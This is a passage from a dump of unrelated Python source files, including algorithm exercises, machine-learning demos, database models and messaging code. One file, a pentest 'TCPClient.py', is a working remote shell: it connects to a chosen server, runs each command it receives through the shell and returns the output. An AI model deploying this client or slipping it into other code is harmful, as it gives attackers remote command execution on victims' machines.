solutions are BRUTE FORCE ?\n Hmmmm... why not O(N)?\n\n Fine fine fine, here comes an easy O(N) solution.\n\n Explanation\n In the first pass,\n use a stack to find all paired parentheses,\n I assume you can do this.\n\n Now just imgine that all parentheses are wormholes.\n As you can see in the diagram,\n the paired parentheses are connected to each other.\n\n image\n\n First it follows the left green arrrow,\n go into the left wormhole and get out from the right wormhole.\n Then it iterates the whole content between parentheses.\n Finally it follows the right arrow,\n go into the left wormhole,\n get out from the right wormhole and finish the whole trip.\n\n So in the second pass of our solution,\n it traverses through the paired parentheses\n and generate the result string res.\n\n i is the index of current position.\n d is the direction of traversing.\n\n\n Complexity\n Time O(N) for two passes\n Space O(N)\n\n \"\"\"\n def doit_stack_parenthesis(self, s: str) -> str:\n opened = []\n pair = {}\n for i, c in enumerate(s):\n if c == '(':\n opened.append(i)\n if c == ')':\n j = opened.pop()\n pair[i], pair[j] = j, i\n res = []\n i, d = 0, 1\n while i < len(s):\n if s[i] in '()':\n i = pair[i]\n d = -d\n else:\n res.append(s[i])\n i += d\n return ''.join(res)","sub_path":"PythonLeetcode/leetcodeM/1190_ReverseSubstringsBetweenEachPairofParentheses.py","file_name":"1190_ReverseSubstringsBetweenEachPairofParentheses.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"369565737","text":"import mercadopago\n\n# from database.firestore import get_product\nsdk = mercadopago.SDK(\"\")\n\n\nasync def status_order(data):\n data[\"transaction_amount\"] = data[\"transactionAmount\"]\n data.pop(\"transactionAmount\")\n data[\"issuer_id\"] = data[\"issuerId\"]\n data.pop(\"issuerId\")\n data[\"payment_method_id\"] = data[\"paymentMethodId\"]\n data.pop(\"paymentMethodId\")\n payment_response = sdk.payment().create(data)\n return payment_response[\"response\"]\n","sub_path":"services/mercado_pago.py","file_name":"mercado_pago.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"597012601","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n支持向量机(SVM)算法,线性可区分\n\"\"\"\nimport numpy as np\nimport pylab as pl\nfrom sklearn import svm\n\n# seed值为0,第一次随机产生的数,以后再重新运行程序不在变化,值为1,则每次重新运行都产生新的数值\nnp.random.seed(0)\n\n# 随机产生支持向量,20行两列\nx = np.r_[np.random.randn(20, 2) - [2, 2], np.random.randn(20, 2) + [2, 2]]\ny = [0] * 20 + [1] * 20 # 标记的定义\n\n# 创建分类器\nclf = svm.SVC(kernel='linear')\n\n# 建模、\nclf.fit(x, y)\n\n# get the separating hyperplane(w0x+w1y+w3=0)转化为-(w0/w1)x-(w3/w1)=y\nw = clf.coef_[0]\na = -w[0] / w[1] # 斜率-(w0/w1)=a\nxx = np.linspace(-5, 5)\n# clf.intercept_[0])是w3偏差(bias),即截距(intercept)\nyy = a * xx - (clf.intercept_[0]) / w[1]\n\n# plot the parallels to the separating hyperplane that pass through the\n# support vectors(求上下两条边界线)\nb = clf.support_vectors_[0]\nyy_down = a * xx + (b[1] - a * b[0])\nb = clf.support_vectors_[-1]\nyy_up = a * xx + (b[1] - a * b[0])\n\nprint(\"w: \", w)\nprint(\"a: \", a)\nprint(\"xx: \", xx)\nprint(\"yy: \", yy)\nprint(\"support_vectors_: \", clf.support_vectors_)\nprint(\"clf.coef_: \", clf.coef_)\n\n# 通过pl画图\n# plot the line, the points, and the nearest vectors to the plane\npl.plot(xx, yy, 'k-') # xx值,yy值,最后一个参数是线条的表示形式\npl.plot(xx, yy_down, 'k--')\npl.plot(xx, yy_up, 'k--')\n\n# 画出生成的40个支持向量的点,s表示点点的大小,c就是color嘛,marker就是点点的形状o,x,*><^,\n# alpha是点点的亮度\npl.scatter(\n clf.support_vectors_[:, 0],\n clf.support_vectors_[:, 1],\n s=30,\n c='red',\n marker='o',\n alpha=0.5)\npl.scatter(x[:, 0], x[:, 1], s=30, c='blue', marker='x', alpha=0.5)\n\n# axis tight是使坐标系的最大值和最小值和你的数据范围一致!\npl.axis('tight')\npl.show()\n","sub_path":"scikit_learn_study/scikit_learn5.py","file_name":"scikit_learn5.py","file_ext":"py","file_size_in_byte":1916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"452795274","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\nfrom extensions import db\n\n\nclass Group(db.Model):\n __tablename__ = 'groups'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n name = db.Column(db.String(200), nullable=False, index=True)\n description = db.Column(db.Text)\n hosts = db.relationship('Host', backref='Group', lazy='dynamic')\n\n def __repr__(self):\n return '%s' % self.name\n\n\nclass Host(db.Model):\n __tablename__ = 'hosts'\n id = db.Column(db.Integer, primary_key=True, autoincrement=True)\n ip_address = db.Column(db.String(39), nullable=False, index=True)\n ip_address_alias = db.Column(db.String(200))\n port = db.Column(db.Integer, nullable=False, index=True)\n port_alias = db.Column(db.String(200))\n description = db.Column(db.Text)\n is_active = db.Column(db.Boolean, default=False)\n group_id = db.Column(db.Integer, db.ForeignKey('groups.id'))\n\n def __repr__(self):\n return '%s:%s' % (self.ip_address, self.port)\n","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":1002,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"522009195","text":"import numpy as np\r\nimport chainer\r\nfrom chainer import Variable\r\nfrom chainer import optimizers\r\nfrom chainer import Chain\r\nimport chainer.functions as F\r\nimport chainer.links as L\r\n\r\ndef toIndex(array):\r\n maxlen = max(array)+1\r\n ret_array = []\r\n for _ in array:\r\n index_array = [0] * maxlen\r\n index_array[_] = 1\r\n ret_array.append(index_array)\r\n return ret_array\r\n\r\nclass MyChain(chainer.Chain):\r\n def __init__(self):\r\n super(MyChain, self).__init__(\r\n l0 = L.Linear(784, 256),\r\n l1 = L.Linear(256, 64),\r\n l2 = L.Linear(64, 32),\r\n l3 = L.Linear(32, 10),\r\n )\r\n def __call__(self, x):\r\n h0 = F.relu(self.l0(x))\r\n h1 = F.relu(self.l1(h0))\r\n h2 = F.relu(self.l2(h1))\r\n h3 = F.sigmoid(self.l3(h2))\r\n return h3\r\n\r\nclass BatchArray:\r\n def __init__(self, arr_x, arr_t):\r\n self.arr_x = arr_x\r\n self.arr_t = arr_t\r\n self.length = len(arr_x)\r\n\r\n def __call__(self, batch_size=128):\r\n b = np.random.randint(0, self.length-batch_size)\r\n return self.arr_x[b:b+batch_size], self.arr_t[b:b+batch_size] \r\n\r\nmodel = MyChain()\r\noptimizer = chainer.optimizers.Adam()\r\noptimizer.setup(model)\r\n\r\ntrain, test = chainer.datasets.get_mnist()\r\nxs, ts = train._datasets # 60000\r\nts = np.array(toIndex(ts), \"float32\")\r\nbatch = BatchArray(xs, ts)\r\n\r\ntxs, tts = test._datasets # 60000\r\ntts = np.array(toIndex(tts), \"float32\")\r\nbatch_t = BatchArray(txs, tts)\r\n\r\nfor _ in range(3000):\r\n x, t = batch(256)\r\n\r\n model.cleargrads()\r\n y = model(x)\r\n loss = F.mean_squared_error(y, t)\r\n loss.backward()\r\n optimizer.update()\r\n\r\n vx, vt = batch_t(128)\r\n val_y = model(vx)\r\n val_loss = F.mean_squared_error(val_y, vt)\r\n if _ % 100 == 0:\r\n print(\"epoch:%d ---> loss:%.3f val_loss:%.3f\" % (_, loss.data, val_loss.data))","sub_path":"ml/MNIST/FNN/c_FNN.py","file_name":"c_FNN.py","file_ext":"py","file_size_in_byte":1895,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"540564574","text":"import json\nimport pika\n\nclass Sender(object):\n \n def __init__(self):\n self.__connection = None\n self.__channel = None\n self.__queue_name = 'MyTestQueue'\n \n def run(self):\n \"\"\"\n Send messages from keyboard until the user aborts by entering \"quit\"\n \"\"\"\n params = pika.ConnectionParameters(host='localhost')\n self.__connection = pika.AsyncoreConnection(parameters=params)\n self.__channel = self.__connection.channel()\n self.__channel.queue_declare(\n queue=self.__queue_name,\n durable=True,\n exclusive=False,\n auto_delete=False)\n \n keepGoing = True\n while keepGoing:\n i = raw_input(\"\\nEnter a message [or 'quit' to quit]\\n\")\n if i.lower() == 'quit':\n keepGoing = False\n else:\n self.__send_message(i)\n \n self.__connection.close()\n pika.asyncore_loop()\n \n def __send_message(self, message):\n \n print('Sending \"{0}\"'.format(message))\n \n message = {\n 'type': 'message',\n 'content': message\n }\n \n encoded = json.dumps(message)\n \n props = pika.BasicProperties(\n content_type='application/json',\n delivery_mode=2)\n \n self.__channel.basic_publish(\n exchange='',\n routing_key=self.__queue_name,\n body=encoded,\n properties=props,\n block_on_flow_control=True)\n\nif __name__ == '__main__':\n client = Sender()\n client.run()","sub_path":"src/1/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"164100513","text":"import numpy as np\nfrom reid.utils.data import transforms as T\nfrom torch.utils.data import DataLoader\nfrom reid.utils.data.preprocessor import Preprocessor\n\n\ndef get_dataloader(dataset,data_dir,\n training=False, height=256,\n width=128, batch_size=64, workers=1):\n normalizer = T.Normalize(mean=[0.485, 0.456, 0.406],\n std=[0.229, 0.224, 0.225])\n\n if training:\n transformer = T.Compose([\n T.RandomSizedRectCrop(height, width),\n T.RandomHorizontalFlip(),\n T.ToTensor(),\n normalizer,\n ])\n else:\n transformer = T.Compose([\n T.RectScale(height, width),\n T.ToTensor(),\n normalizer,\n ])\n data_loader = DataLoader(\n Preprocessor(dataset, root=data_dir,\n transform=transformer),\n batch_size=batch_size, num_workers=workers,\n shuffle=training, pin_memory=True, drop_last=training)\n return data_loader\n\n\ndef update_train_untrain(sel_idx,train_data,untrain_data,pred_y):\n assert len(train_data[0]) == len(untrain_data[0])\n add_data = [(untrain_data[i][0],int(pred_y[i]),untrain_data[i][2])\n for i,flag in enumerate(sel_idx) if flag]\n data1 = [untrain_data[i]\n for i,flag in enumerate(sel_idx) if not flag]\n data2 = train_data + add_data\n return data2, data1\n\n\ndef sel_idx(score,train_data,ratio=0.5):\n y = np.array([label for _,label,_ in train_data])\n add_indices = np.zeros(score.shape[0])\n clss = np.unique(y)\n assert score.shape[1] == len(clss)\n count_per_class = [sum(y == c) for c in clss]\n pred_y = np.argmax(score,axis=1)\n for cls in range(len(clss)):\n indices = np.where(pred_y == cls)[0]\n cls_score = score[indices,cls]\n idx_sort = np.argsort(cls_score)\n add_num = min(int(np.ceil(count_per_class[cls] * ratio)),\n indices.shape[0])\n add_indices[indices[idx_sort[-add_num:]]] = 1\n return add_indices.astype('bool')\n\n\ndef split_dataset(dataset,train_ratio=0.2,seed=0):\n \"\"\"\n split dataset to train_set and untrain_set\n \"\"\"\n assert 0 <= train_ratio <= 1\n train_set = []\n untrain_set = []\n np.random.seed(seed)\n pids = np.array([data[1] for data in dataset])\n clss = np.unique(pids)\n assert len(clss) == 751\n for cls in clss:\n indices = np.where(pids == cls)[0]\n np.random.shuffle(indices)\n train_num = int(np.ceil((len(indices) * train_ratio)))\n train_set += [dataset[i] for i in indices[:train_num]]\n untrain_set += [dataset[i] for i in indices[train_num:]]\n cls1 = np.unique([d[1] for d in train_set])\n cls2 = np.unique([d[1] for d in untrain_set])\n assert len(cls1) == len(cls2) and len(cls1) == 751\n return train_set,untrain_set\n","sub_path":"reid/utils/data/data_process.py","file_name":"data_process.py","file_ext":"py","file_size_in_byte":2856,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"13347065","text":"\"\"\"\nПоследовательность треугольных чисел образуется путем сложения натуральных чисел. К примеру, 7-ое треугольное число равно 1 + 2 + 3 + 4 + 5 + 6 + 7 = 28. Первые десять треугольных чисел:\n\n1, 3, 6, 10, 15, 21, 28, 36, 45, 55, ...\n\nПеречислим делители первых семи треугольных чисел:\n\n 1: 1\n 3: 1, 3\n 6: 1, 2, 3, 6\n10: 1, 2, 5, 10\n15: 1, 3, 5, 15\n21: 1, 3, 7, 21\n28: 1, 2, 4, 7, 14, 28\nКак мы видим, 28 - первое треугольное число, у которого более пяти делителей.\n\nКаково первое треугольное число, у которого более пятисот делителей?\n\"\"\"\n\ndef dividers(n):\n import itertools as iter\n i = 2\n primfac = []\n while i * i <= n:\n while n % i == 0:\n primfac.append(i)\n n = n / i\n i = i + 1\n if n > 1:\n primfac.append(n)\n simples_uniq = list(set(primfac))\n counts = [[j for j in range(primfac.count(i) + 1)] for i in simples_uniq]\n delims = []\n for i in iter.product(*counts):\n delim = 1\n for j in range(len(i)):\n delim *= simples_uniq[j]**i[j]\n delims.append(int(delim))\n return sorted(delims)\n\ni = 2\nwhile 1:\n num = sum(range(i))\n dels_len = len(dividers(num))\n if dels_len > 500:\n print(num)\n break\n i += 1\n","sub_path":"12.py","file_name":"12.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"395556533","text":"__author__ = 'garik'\n\n\nimport SparseMatrix as sm\n\ndef compare_yale_sm(A, B, tname):\n if A.elements == B.elements and A.ie == B.ie and A.jsm == B.jsm:\n print(tname + ' is ok')\n else:\n print(tname + ' is failed')\n\ndef init_A():\n M = [[0,0,0,0], [5,8,0,0], [0,0,3,0], [0,6,2,1]]\n A = sm.YaleSM()\n A.from_2d_list(M)\n return A\n# ===============testcase 1 __putitem__===============\n\nB = sm.YaleSM([1, 3], [0,2], [1, 3])\nA = init_A()\nA[1] = B\nAns = [[0,0,0,0], [0,1,0,3], [0,0,3,0], [0,6,2,1]]\nC = sm.YaleSM()\nC.from_2d_list(Ans)\ncompare_yale_sm(A, C, '#1')\n\nA = init_A()\nA[2] = B\nAns = [[0,0,0,0], [5,8,0,0], [0,1,0,3], [0,6,2,1]]\nC = sm.YaleSM()\nC.from_2d_list(Ans)\ncompare_yale_sm(A, C, '#2')\n\nA = init_A()\nA[3] = B\nAns = [[0,0,0,0], [5,8,0,0], [0,0,3,0], [0,1,0,3]]\nC = sm.YaleSM()\nC.from_2d_list(Ans)\ncompare_yale_sm(A, C, '#3')\n\nA = init_A()\nA[-1] = B\nAns = [[0,0,0,0], [5,8,0,0], [0,0,3,0], [0,1,0,3]]\nC = sm.YaleSM()\nC.from_2d_list(Ans)\ncompare_yale_sm(A, C, '#4')\n\nA = init_A()\ntry:\n A[4] = B\nexcept ValueError:\n print('#5 - value error. ok')\n\nA = init_A()\ntry:\n A[0:2] = B\nexcept ValueError:\n print('#6 - value error. ok')\n\n# ===============testcase 2 __putitem__===============\nA = init_A()\nB = sm.YaleSM([1, 3], [0,2], [1, 4])\ntry:\n A[0] = B\nexcept ValueError:\n print('#7 - value error. ok')\n\nA = init_A()\nB = [[1, 3], [0,1,2], [1, 2]]\ntry:\n A[0] = B\nexcept ValueError:\n print('#9 - value error. ok')\n\n","sub_path":"Gauss/tets/test_case_putitem.py","file_name":"test_case_putitem.py","file_ext":"py","file_size_in_byte":1464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"476192130","text":"#!/usr/bin/env python3\n\nimport subprocess\nimport socket\nimport sys\n\ndef ExecuteCommand(cmd):\n #\n return subprocess.check_output(cmd,shell=True)\n\ndef main():\n #\n print(\"[*] TCP Client [*]\")\n #\n s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n #\n addr = input(\"[+] Server address-> \")\n #\n port = int(input(\"[+] Server port-> \"))\n #\n msg = b\"\\n[*] Connection Established [*]\\n\"\n #\n print(\"[*] Resource: %s|%s \" % (addr,port))\n #\n print(\"[*] Connecting to: %s|%s \" % (addr,port))\n #\n try:\n #\n s.connect((addr,port))\n #\n except:\n #\n print(\"[!] Connection Failure [!]\")\n #\n sys.exit(1)\n #\n try:\n #\n print(\"[*] Sending Message [*]\")\n #\n s.send(msg)\n #\n except:\n #\n print(\"[!] Transmission Failure [!]\")\n #\n sys.exit(1)\n #\n while(True):\n #\n buffer = s.recv(1024)\n #\n result = ExecuteCommand(buffer)\n #\n s.send(result)\n #\n print(result)\n #\n s.close()\n\nif(__name__ == '__main__'):\n #\n main()\n","sub_path":"Python-Pentest-Tools/Remote-Access/Socket/TCPClient.py","file_name":"TCPClient.py","file_ext":"py","file_size_in_byte":1152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"16709641","text":"#! /usr/bin/env python\r\n# *-* coding: UTF-8 *-*\r\n\r\n# kytten/document.py\r\n# Copyrighted (C) 2009 by Conrad \"Lynx\" Wong\r\n# Copyrighted (C) 2013 by \"Parashurama\"\r\nfrom __future__ import unicode_literals, print_function\r\n\r\nimport pyglet\r\n\r\nfrom .widgets import Control\r\nfrom .scrollbar import VScrollbar\r\nfrom .override import KyttenIncrementalTextLayout\r\nfrom .base import string_to_unicode, iteritems\r\n\r\nclass KyttenDocumentError(Exception):pass\r\n\r\nclass Document(Control):\r\n '''\r\n Allows you to embed a document within the GUI, which includes a\r\n vertical scrollbar as needed.\r\n '''\r\n def __init__(self, document, formatted=False, width=1000, height=5000, name=None,\r\n is_fixed_size=False, always_show_scrollbar=False, text_color=None, font=None, font_size=None, group = None):\r\n '''\r\n Creates a new Document.\r\n '''\r\n Control.__init__(self, width=width, height=height, name=name, group=group)\r\n self.max_height = height\r\n self.content_width = width\r\n self.document =None\r\n\r\n if hasattr(document, 'startswith'): # document is a string\r\n self.set_document(self.create_document(document, formatted))\r\n else:\r\n self.set_document(document)\r\n\r\n self.content = None\r\n self.content_width = width\r\n self.text_color = text_color\r\n self.font_size = font_size\r\n self.font = font\r\n self.scrollbar = None\r\n self.scrollbar_to_ensure_visible=None\r\n self.set_document_style = False\r\n self.is_fixed_size = is_fixed_size\r\n self.always_show_scrollbar = always_show_scrollbar\r\n self.needs_layout = False\r\n self.link_reference={}\r\n\r\n def create_document(self, text, formatted):\r\n text = string_to_unicode(text)\r\n\r\n if not formatted: document = pyglet.text.document.UnformattedDocument(text)\r\n elif 'attr' in formatted.lower(): document = pyglet.text.decode_attributed(text)\r\n elif 'html' in formatted.lower(): document = pyglet.text.decode_html(text)\r\n\r\n else: raise TypeError('Unrecognized formattage type')\r\n\r\n self._formatting = formatted\r\n\r\n return document\r\n\r\n def set_document(self, document):\r\n if not isinstance(document, pyglet.text.document.AbstractDocument):\r\n raise TypeError('Invalid document type. Require pyglet document instance')\r\n\r\n if self.document is not None:\r\n if self.content is not None:\r\n self.content.delete()\r\n self.content = None\r\n\r\n self.document.delete_text(0, len(self.document.text))\r\n\r\n if isinstance(document, pyglet.text.document.FormattedDocument):\r\n self.isFormatted = True\r\n else:\r\n self.isFormatted =False\r\n self.set_document_style = False\r\n\r\n self.document = document\r\n self.document_type = document.__class__\r\n\r\n def _do_set_document_style(self, attr, value):\r\n length = len(self.document.text)\r\n runs = [(start, end, doc_value) for start, end, doc_value in\r\n self.document.get_style_runs(attr).ranges(0, length)\r\n if doc_value is not None]\r\n if not runs:\r\n terminator = len(self.document.text)\r\n else:\r\n terminator = runs[0][0]\r\n self.document.set_style(0, terminator, {attr: value})\r\n\r\n def _get_controls(self):\r\n controls = []\r\n if self.scrollbar:\r\n controls += self.scrollbar._get_controls()\r\n controls += Control._get_controls(self)\r\n return controls\r\n\r\n def delete(self):\r\n Control.delete(self)\r\n if self.content is not None and self.visible is False:\r\n self.content.delete()\r\n self.content = None\r\n\r\n if self.scrollbar is not None:\r\n self.scrollbar.delete()\r\n self.scrollbar = None\r\n\r\n def teardown(self):\r\n Control.teardown(self)\r\n\r\n if self.document is not None:\r\n self.document.delete_text(0, len(self.document.text))\r\n self.document = None\r\n\r\n def do_set_document_style(self, dialog):\r\n self.set_document_style = True\r\n\r\n # Check the style runs to make sure we don't stamp on anything\r\n # set by the user\r\n self._do_set_document_style('color', self.text_color or dialog.theme['text_color'])\r\n self._do_set_document_style('font_name', self.font or dialog.theme['font'])\r\n self._do_set_document_style('font_size', self.font_size or dialog.theme['font_size'])\r\n\r\n def get_text(self):\r\n return self.document.text\r\n\r\n def layout(self, x, y):\r\n self.x, self.y = x, y\r\n\r\n if self.content is not None:\r\n self.content.begin_update()\r\n self.content.x = x\r\n self.content.y = y\r\n\r\n if self.scrollbar is not None:\r\n pos = self.scrollbar.get(self.max_height,self.content.content_height)\r\n\r\n if pos != -self.content.view_y:\r\n #performance hack (was #self.content.view_y = -pos )\r\n #bypass reflowing glyphes\r\n pyglet.text.layout.ScrollableTextLayout._set_view_y(self.content, -pos)\r\n\r\n self.scrollbar.layout(x + self.content_width, y)\r\n\r\n self.content.end_update()\r\n\r\n\r\n def on_update(self, dt):\r\n '''\r\n On updates, we update the scrollbar and then set our view offset\r\n if it has changed.\r\n\r\n @param dt Time passed since last update event (in seconds)\r\n '''\r\n if self.scrollbar is not None:\r\n self.scrollbar.dispatch_event('on_update', dt)\r\n\r\n if self.needs_layout:\r\n self.needs_layout = False\r\n self.saved_dialog.set_needs_layout()\r\n\r\n def _force_refresh(self):\r\n '''\r\n Forces recreation of any graphic elements we have constructed.\r\n Overriden to avoid needlessly recreating pyglet text elements.\r\n '''\r\n if self.saved_dialog is not None:\r\n self.saved_dialog.set_needs_layout()\r\n\r\n def size(self, dialog):\r\n if dialog is None:\r\n return\r\n\r\n Control.size(self, dialog)\r\n if not self.set_document_style:\r\n # Set Document Style for unformatted Documment\r\n self.do_set_document_style(dialog)\r\n\r\n if self.content is None:\r\n self.content = KyttenIncrementalTextLayout( self.document, self.content_width,\r\n self.max_height, multiline=True,\r\n batch=dialog.batch, group=dialog.fg_group)\r\n\r\n if self.is_fixed_size or (self.max_height and self.content.content_height > self.max_height):\r\n self.height = self.max_height\r\n else:\r\n self.height = self.content.content_height\r\n\r\n self.content.height = self.height\r\n\r\n if self.always_show_scrollbar or (self.max_height and self.content.content_height > self.max_height):\r\n if self.scrollbar is None:\r\n self.scrollbar = VScrollbar(self.max_height)\r\n self.scrollbar.size(dialog)\r\n self.scrollbar.set(self.max_height, self.content.content_height)\r\n\r\n elif self.scrollbar is not None and (self.max_height and self.content.content_height < self.max_height):\r\n self.scrollbar.delete()\r\n self.scrollbar = None\r\n\r\n if self.scrollbar is not None:\r\n self.width = self.content_width + self.scrollbar.width\r\n if self.scrollbar_to_ensure_visible is not None:\r\n self.scrollbar.ensure_visible(*self.scrollbar_to_ensure_visible)\r\n self.scrollbar_to_ensure_visible=None\r\n\r\n else:\r\n self.width = self.content_width\r\n\r\n def ensure_line_visible(self, line):\r\n if self.content is not None:\r\n\r\n line = self.content.lines[line]\r\n if self.scrollbar is not None:\r\n self.scrollbar.ensure_visible(line.y,line.y+line.ascent-line.descent, line.ascent-line.descent)\r\n else:\r\n self.scrollbar_to_ensure_visible = (line.y,line.y+line.ascent-line.descent, line.ascent-line.descent)\r\n self._force_refresh()\r\n\r\n def set_content_width(self, width):\r\n self.content_width = width\r\n if self.content is not None:\r\n self.content.width = width\r\n self._force_refresh()\r\n\r\n def set_text(self, text, formatted=False):\r\n\r\n if formatted != self.isFormatted or self.document is None:\r\n self.set_document(self.create_document(text, formatted))\r\n else:\r\n self.document.text = string_to_unicode(text)\r\n\r\n self._force_refresh()#self.saved_dialog.set_needs_layout()#\r\n\r\n\r\n def insert_text(self, start, text, formatted=False):\r\n\r\n if self.document is not None:\r\n\r\n text = string_to_unicode(text)\r\n\r\n if formatted is not False:\r\n\r\n doc = pyglet.text.decode_attributed(text)\r\n\r\n if self.visible is True:\r\n self.content.begin_update()\r\n self.document.insert_text(start, doc.text)\r\n for attribute, runlist in iteritems(doc._style_runs):\r\n for s, st, value in runlist:\r\n self.document.set_style(start+s, start+st, {attribute:value})\r\n self.content.end_update()\r\n else:\r\n self.document.insert_text(start, doc.text)\r\n for attribute, runlist in iteritems(doc._style_runs):\r\n for s, st, value in runlist:\r\n self.document.set_style(start+s, start+st, {attribute:value})\r\n\r\n else:\r\n self.document.insert_text(start, text)\r\n\r\n self.needs_layout = True\r\n\r\n def append_text(self, text, formatted=False):\r\n '''\r\n Append Text to the end of the document\r\n '''\r\n self.insert_text(len(self.document.text), text, formatted)\r\n\r\n def set_links(self, link_reference):\r\n self.link_reference.update(link_reference)\r\n\r\n def on_mouse_press(self, x, y, *args):\r\n\r\n line = self.content.get_line_from_point(x, y)\r\n position = self.content.get_position_on_line(line, x)\r\n CALLBACK = self.document.get_style('link',position)\r\n\r\n if CALLBACK:\r\n try:\r\n CALLBACK_FUNC = self.link_reference[CALLBACK]\r\n except KeyError:\r\n raise KyttenDocumentError(\"In Formatted Document '{}' link reference '{}' is Invalid!\".format(self.name, CALLBACK))\r\n else:\r\n if not hasattr(CALLBACK_FUNC, '__iter__'):\r\n CALLBACK_FUNC()\r\n else:\r\n for callback_func in CALLBACK_FUNC:\r\n callback_func()\r\n\r\n def on_gain_focus(self):\r\n Control.on_gain_focus(self)\r\n if self.scrollbar is not None and self.saved_dialog is not None:\r\n self.saved_dialog.set_focus(self.scrollbar)\r\n\r\n def on_lose_highlight(self):\r\n Control.on_lose_highlight(self)\r\n\r\n if self.scrollbar is not None and self.saved_dialog is not None:\r\n self.saved_dialog.set_focus(None)\r\n\r\n def hit_test(self, x, y):\r\n '''\r\n True if the given point lies within our area.\r\n\r\n @param x X coordinate of point\r\n @param y Y coordinate of point\r\n @returns True if the point is within our area\r\n '''\r\n if self.scrollbar is not None:\r\n return x >= self.x and x < self.x + self.width - self.scrollbar.width and \\\r\n y >= self.y and y < self.y + self.height\r\n else:\r\n return x >= self.x and x < self.x + self.width and \\\r\n y >= self.y and y < self.y + self.height\r\n","sub_path":"kytten/document.py","file_name":"document.py","file_ext":"py","file_size_in_byte":11934,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"513913264","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport time\n\nimport tensorflow as tf\n\nimport model\nsys.path.append(os.path.dirname(os.path.abspath(os.path.dirname(__file__))))\nfrom input_pipeline import inputs\nfrom drawer import LogDirs\n\ndef train(tfrecords_path, tfevents_path, ckpt_path, batch_size, num_epochs):\n with tf.Graph().as_default():\n with tf.name_scope('input'):\n images, labels = inputs(path=tfrecords_path,\n batch_size=batch_size,\n num_epochs=num_epochs)\n with tf.name_scope('dropout'):\n keep_prob = tf.placeholder(tf.float32)\n logits = model.inference(images, keep_prob)\n prediction = tf.nn.softmax(logits)\n loss = model.loss(logits, labels)\n accuracy = model.evaluation(logits, labels)\n train_op = model.training(loss, learning_rate=0.01)\n init_op = tf.group(tf.global_variables_initializer(),\n tf.local_variables_initializer())\n # Create a session for running operations in the Graph.\n sess = tf.Session()\n merged = tf.summary.merge_all()\n writer = tf.summary.FileWriter(tfevents_path, sess.graph)\n # Add ops to save and restore all the variables.\n saver = tf.train.Saver(max_to_keep=100000)\n sess.run(init_op)\n coord = tf.train.Coordinator()\n threads = tf.train.start_queue_runners(sess=sess, coord=coord)\n step=0\n try:\n while not coord.should_stop():\n start_time = time.time()\n # training\n _ = sess.run(train_op, feed_dict={keep_prob: 0.5})\n duration = time.time() - start_time\n # write summary and print loss\n if step % 100 == 0:\n summary, acc_value, loss_value = sess.run([merged, accuracy, loss],\n feed_dict={keep_prob: 1.0})\n writer.add_summary(summary, step)\n print('Step %d: loss = %.2f, accuracy = %.3f (%.3f sec)' % (step, loss_value, acc_value, duration))\n if step % 1000 == 0:\n saver.save(sess, ckpt_path + '/run', global_step=step)\n step += 1\n except tf.errors.OutOfRangeError:\n print('Done training for %d epochs, %d steps.' % (num_epochs, step))\n finally:\n writer.close()\n # When done, ask the threads to stop.\n coord.request_stop()\n # Wait for threads to finish.\n coord.join(threads)\n sess.close()\n\n\nif __name__ == '__main__':\n log = LogDirs(dpath = '../../logs/vggnet-0')\n log.mkdirs()\n train(tfrecords_path = '../../data/tfrecords/jet15_rgb_train.tfrecords',\n tfevents_path = log.tfevents_train,\n ckpt_path = log.ckpt,\n batch_size = 100,\n num_epochs=10)\n","sub_path":"deepJet/vggnet/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":3019,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"298212570","text":"from collections.abc import Iterable\nfrom copy import deepcopy\nfrom enum import Enum\nfrom itertools import permutations\n\n\ndef count_ways(n):\n if n < 0:\n return 0\n elif n == 0:\n return 1\n return count_ways(n - 1) + count_ways(n - 2) + count_ways(n - 3)\n\n\ndef count_ways_dynamic(n, l: list):\n if n < 0:\n return 0\n elif n == 0:\n return 1\n elif not l[n]:\n l[n] = (count_ways_dynamic(n - 1, l)\n + count_ways_dynamic(n - 2, l)\n + count_ways_dynamic(n - 3, l))\n return l[n]\n\n\nclass Field():\n def __init__(self, i=5, nonfree_points: Iterable=None):\n self._matrix = []\n self._nonfree_points = []\n self._nonfree_points += nonfree_points\n for _ in range(i):\n self._matrix.append([None for _ in range(i)])\n\n def get_path(self, t: tuple, path: list, cache: dict):\n path.append(t)\n #b = cache.get(t)\n #if b is not None:\n # return b\n x = t[0]\n y = t[1]\n if x == 0 and y == 0:\n return True\n next_p = (x - 1, y)\n b = False\n if x > 0 and self._is_free(next_p):\n b = self.get_path(next_p, path, cache)\n next_p = (x, y - 1)\n if not b and y > 0 and self._is_free(next_p):\n b = self.get_path(next_p, path, cache)\n #if not b:\n # path.remove(t)\n cache[t] = b\n return b\n\n def _is_free(self, t: tuple):\n if t in self._nonfree_points:\n return False\n return True\n\n\ndef find_magic_index(ints: 